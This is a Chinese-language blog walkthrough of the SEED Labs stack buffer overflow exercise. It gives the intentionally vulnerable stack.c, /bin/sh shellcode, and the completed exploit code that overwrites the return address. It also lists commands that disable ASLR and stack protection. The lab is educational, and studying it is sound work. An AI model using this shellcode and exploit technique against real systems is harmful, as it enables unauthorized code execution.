SEED labs——buffer_overflow

栈的缓冲区溢出攻击

实验环境：Ubuntu16.04虚拟机，32bit

实验原理1：

在程序中，内存复制时，数据长度超过程序预先分配的空间，而某些语言（如c和c++）并不检测缓冲区溢出问题。攻击者可以利用这一现象向缓冲区注入恶意代码。

实验提供一个存在缓冲区溢出问题的有漏洞的代码：stack.c

/* Vunlerable program: stack.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 24
#endif
int bof(char *str)
{
　　char buffer[BUF_SIZE];
　　/* The following statement has a buffer overflow problem */
　　strcpy(buffer, str); 
　　return 1;
}
int main(int argc, char **argv)
{
　　char str[517];
　　FILE *badfile;
　　/* Change the size of the dummy array to randomize the parametersfor this lab. Need to use the array at least once */
　　char dummy[BUF_SIZE]; memset(dummy, 0, BUF_SIZE);
　　badfile = fopen("badfile", "r");
　　fread(str, sizeof(char), 517, badfile);
　　bof(str);
　　printf("Returned Properly\n");
　　return 1;
}

　　其中，在bof函数中使用的strcpy函数可能会引发缓冲区溢出的问题。

　　想要利用这个漏洞进行恶意代码注入，则需要构造字符参数str，而str来自于一个名为“badfile”的文件。因此，我们将恶意代码写到badfile中，在程序运行时，badfile里的内容就会被复制到缓冲区。

　　实验提供一个程序，它的功能就是构造恶意代码（或许构造恶意攻击更为准确）。

/* exploit.c */
/* A program that creates a file containing code for launching shell */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[] =
　　"\x31\xc0" /* Line 1: xorl %eax,%eax */
　　"\x50" /* Line 2: pushl %eax */
　　"\x68""//sh" /* Line 3: pushl $0x68732f2f */
　　"\x68""/bin" /* Line 4: pushl $0x6e69622f */
　　"\x89\xe3" /* Line 5: movl %esp,%ebx */
　　"\x50" /* Line 6: pushl %eax */
　　"\x53" /* Line 7: pushl %ebx */
　　"\x89\xe1" /* Line 8: movl %esp,%ecx */
　　"\x99" /* Line 9: cdq */
　　"\xb0\x0b" /* Line 10: movb $0x0b,%al */
　　"\xcd\x80" /* Line 11: int $0x80 */
　　;
void main(int argc, char **argv)
{
　　char buffer[517];
　　FILE *badfile;
　　/* Initialize buffer with 0x90 (NOP instruction) */
　　memset(&buffer, 0x90, 517);
　　/* You need to fill the buffer with appropriate contents here */

　　/* ... Put your code here ... */

　　/* Save the contents to the file "badfile" */
　　badfile = fopen("./badfile", "w");
　　fwrite(buffer, 517, 1, badfile);
　　fclose(badfile);
}

　　shellcode数组就是实验提供的恶意代码（以机器指令的形式给出），这段代码被系统执行后，我们将会得到一个shell。shell的通俗理解就是解释器。

　　那么是否恶意代码被复制到缓冲区就可以得到shell了呢？

　　不完全正确。

实验原理2：本实验的缓冲区溢出攻击利用了函数返回原理。所谓的函数返回，就像大家接触到的那样，在程序运行中，某个函数执行完毕，便要返回它的上一级，也就是调用完这个函数之后的地方，继续执行代码。函数实现返回的方法就是读某个返回地址，而这个函数执行后的返回地址，它存放的位置有明确的规则，也就是说有法可依，有迹可循。

　　上图给出了func()函数被调用时，操作系统为其分配的内存情况。这一块内存空间（灰色的）称为“栈帧”。

　　Current FP是当前栈帧的指针，其他内存地址可以在它之上用正负偏移量来表示。

　　这是一个用高端地址向低端地址生长的栈，可以看到，在栈帧中，最先入栈的是func()的形参*str，再者是函数执行完的返回地址。

　　Previous FP是前帧指针，在这里不做论述。

　　再往下是局部变量buffer数组和变量a。

　　我们了解了函数调用时生成的栈帧，就可以发现其中的一些有趣的地方。

　　①在stack.c中，读取文件中的内容到缓冲区，实际上就是把badfile里的内容读到了栈帧中的buffer数组内，并且可以远超这个规定好的长度，全部复制进去。此时shellcode当然也被写进了buffer。

　　②假如我们能够修改栈帧中的返回地址，将其改为我们存放shellcode的地址，那么当strcpy将数据从文件中读出、写入到buffer数组中、要返回时，就会返回到buffer数组中某个位置，也就是shellcode的首地址。那么，系统接着执行的就是我们设计好的、希望系统执行的指令，最终的执行效果是为我们打开一个shell。

　　那么，问题就变得非常的具体了。

　　我们需要分别获得2个地址：①shellcode在栈帧中存放的地址。②函数执行完返回地址在栈帧中存放的地址。

　　首先，我们来分析如何得到①。

　　显而易见，buffer数组中的数据都是由exploit.c运行生成的。

/* Initialize buffer with 0x90 (NOP instruction) */
　　memset(&buffer, 0x90, 517);

　　实验中给出的原始代码中，badfile内容全部由NOP指令的机器码填充，系统读到它时，会自动跳到下一条指令去执行。

　　可以看到，shellcode数组还没有被写到badfile里面。

　　我们可以在程序中的“/* ... Put your code here ... */”提示的下一行添加这样一条代码。

    strcpy(buffer+100,shellcode);            //将shellcode拷贝至buffer

　　这样shellcode就被写进了badfile，在stack.c运行bof函数时，shellcode就可以被读入栈帧的buffer数组中去。

　　为什么不从文件的第一行开始写入shellcode，而是要从100行开始呢？因为做人要留一线，严丝合缝往往代表着容错率比较低。

　　在exploit程序中，buffer数组的大小是517，所以shellcode存放的位置需要在517之内，否则程序会报错。

　　现在我们知道shellcode首地址相对于buffer数组首地址的偏移量是100了，因为这是我们自己规定的，但是我们仍然不知道buffer在栈帧内的首地址，也就不知道shellcode在栈帧的首地址。

　　那我们接下来就来解决这个问题。我们在虚拟机的terminal中执行以下命令。

$ sudo sysctl -w kernel.randomize_va_space=0//关闭随机地址机制

$ gcc -g -o stack -z execstack -fno-stack-protector stack.c //编译stack.c、允许调试、允许栈可执行、关闭栈保护

$ gdb stack

(gdb) b main
(gdb) r
(gdb) p /x &str

　　分析stack.c里面main函数的栈帧，当它执行完“fread(str, sizeof(char), 517, badfile);”时，其栈帧里面会装载str数组(等同于栈帧示意图中的buffer数组)。我们使用调试，在main函数上加断点，最终得到的是str数组的首地址，即从badfile文件中读出的数据会读到这个数组中。

　　那么，str数组首地址+shellcode相对于str数组首地址的偏移量=shellcode在栈帧中存放的地址，得到①，即为0xbfffea07+0x64(100的十六进制数)=0xbfffea6b。

　　接下来我们考虑获得②，函数执行完返回地址在栈帧中存放的地址。

　　需要注意的是，我们获取②使用的不是main函数的栈帧，而是stack.c里面的bof的栈帧。（因为bof的返回地址一目了然）

gdb disass bof//查看bof函数的反汇编
gdb quit//退出调试

　　ebp为帧指针寄存器，偏移量以它为基准。可以看到，函数执行完读取返回地址是在第<+24>的位置，此后bof函数便结束了。

　　于是我们又得到了②，那么我们现在要做的就是把bof函数执行后返回地址②里面的内容替换成shellcode的首地址①。

　　在上次添加的代码后，具体操作如下：

strcpy(buffer+100,shellcode);            //将shellcode拷贝至buffer
strcpy(buffer+0x24,"\x6b\xea\xff\xbf");        //在buffer特定偏移处起始的四个字节覆盖sellcode地址

　　注意：内存地址由高向低生长，需要倒放。

　　最后，检验一下我们的成果。

$ gcc -o exploit exploit.c
$./exploit
$./stack

　　正确指令是whoami，这里打错了哈哈哈。

　　聪明的，你学会了吗。

posted @ 2020-12-11 23:50 #DIDIDA# 阅读(941) 评论(0) 编辑收藏举报

刷新页面返回顶部

#DIDIDA#

SEED labs——buffer_overflow

公告